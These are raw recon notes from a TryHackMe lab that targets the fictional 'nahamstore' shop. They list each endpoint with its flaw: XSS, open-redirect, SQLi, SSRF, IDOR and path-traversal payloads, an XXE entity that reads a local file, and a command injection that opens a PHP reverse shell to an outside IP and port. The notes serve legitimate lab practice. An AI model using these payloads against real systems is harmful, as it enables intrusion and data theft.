16 August 2022

Nahamstore Recon Notes

Not a walkthrough or writeup. Just my raw recon notes and vulnerabilities

nahamstore.thm

Ports: 22,80,8000

/<img src=/ onerror=alert()> [rXSS] [Page Not Found]
/?q [rXSS]
/?r [open redirect]
/basket [POST] [address_id] [IDOR, PII]
/register [POST] [register_email, register_password]
/register?redirect_url [open redirect]
/returns [POST] [return_info] [sXSS]
/returns [POST] [order_number] [SQLi]
/uploads [301 -> 127.0.0.1:80]
/login
/logout
/search?q='-alert("test")-' [rXSS] [js param search]
/?q=%22+onfocus%3Dalert()+autofocus+ [rXSS][searchbox]
/stockcheck [POST] [SSRF] server=stock.nahamstore.thm@internal-api.nahamstore.thm?a=&product_id=1
/staff [File Upload - “xlxs only”] [XXE via xlxs]
/account/orders
/account/settings [Email,password change, disable acct]
/account/addressbook [Address change]
/account/addressbook [POST] [new_address_title,new_address_fname,new_address_lname,new_address_line1,new_address_line2,road,new_address_line3,new_address_state,new_address_zipcode]
/account/orders/3
/product?id=2&name=</title> [rXSS]
/product?id=2&discount=" onfocus="alert()" autofocus " [rXSS]
/product [Discount, Add to basket, Check Stock]
/product?id= [SQLi] [rXSS]
/product [POST] [discount] [rXSS]
/product/picture/?file=....//....//....//....//....//lfi/flag.txt [LFI]
/pdf-generator [POST] [IDOR] what=order&id=3%26user_id=3
/pdf-generator [POST] [Blind RCE] what=order&id=4%3b$(php+-r+'$sock%3dfsockopen("10.11.80.81",1337)%3bshell_exec("sh+<%263+>%263+2>%263")%3b')

/orders [Information Disclosuer, IDOR] ["id":"4dbc51716426d49f524e10d4437a5f5a","5ae19241b4b55a360e677fdd9084c21c","70ac2193c8049fcea7101884fd4ef58e"]

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<data>
    <X-Token>
        &xxe;
    </X-Token>
</data>

tags: bug - bounty - tryhackme